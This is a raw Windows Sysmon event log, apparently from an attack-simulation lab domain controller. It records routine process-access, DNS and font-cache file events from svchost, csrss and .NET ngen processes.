14:57:31.905{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBDB-607E-D40C-00000000BB01}5688C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074858Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:31.889{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074857Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:31.874{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074856Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:31.858{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074855Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:31.842{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000074854Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:30.714{A7A01FEF-B636-607E-2D00-00000000BB01}2212C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local60236- 10341000x800000000000000074853Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:31.811{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074852Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:31.796{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBDB-607E-D40C-00000000BB01}5688C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074851Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:31.796{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBDB-607E-D40C-00000000BB01}5688C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000074850Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:31.796{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000074849Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:31.780{A7A01FEF-B626-607E-1100-00000000BB01}1176NT AUTHORITY\LOCAL SERVICEC:\Windows\system32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\FontCache-Obsolete-468.datMD5=662665BA6D6CFD63623A22E23F6DF414,SHA256=DEB311D6B444294FE3C097A99CE8DAD0AA15FF606906FEB0D04FD169D06C26D8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000074848Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:31.780{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074847Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:31.764{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074846Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:31.764{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074845Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:31.717{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074844Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:31.702{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074843Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:31.686{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074842Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:31.655{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000074841Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:31.655{A7A01FEF-B626-607E-1100-00000000BB01}1176NT AUTHORITY\LOCAL SERVICEC:\Windows\system32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\FontCache-Obsolete-359.datMD5=6B4591835145A8DB3ACA766F98137D6A,SHA256=31A5A383679B5672ECB5D1A3BC15D4108DA223E28C154079A6EE8A4F3473D3CA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000074840Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:31.639{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074839Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:31.639{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074838Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:31.608{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074837Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:31.592{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074836Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:31.561{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074835Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:31.545{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000074834Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:31.545{A7A01FEF-B626-607E-1100-00000000BB01}1176NT AUTHORITY\LOCAL SERVICEC:\Windows\system32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\FontCache-Obsolete-218.datMD5=9C20D225A6E5521D52B9DE1E19977D7B,SHA256=7593CC128EF5ADA2E07303DD483E3C4505A22A8C9DAA0AE7065179E968397FCF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000074833Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:31.514{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074832Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:31.483{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074831Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:31.467{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074830Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:31.452{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074829Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:31.436{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074828Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:31.421{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000074827Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:31.405{A7A01FEF-B626-607E-1100-00000000BB01}1176NT AUTHORITY\LOCAL SERVICEC:\Windows\system32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\FontCache-Obsolete-109.datMD5=0E06DB55EAFBD742A967EFEFC5852929,SHA256=FFD87E92EC1C920BC625A4DA69F41832B389C759C6C63335D4A422A9632D3987,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000074826Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:31.405{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074825Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:31.389{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074824Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:31.358{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074823Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:31.358{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074822Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:31.342{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074821Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:31.342{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074820Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:31.327{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+92093|c:\windows\system32\fntcache.dll+68312|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074819Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:31.311{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft 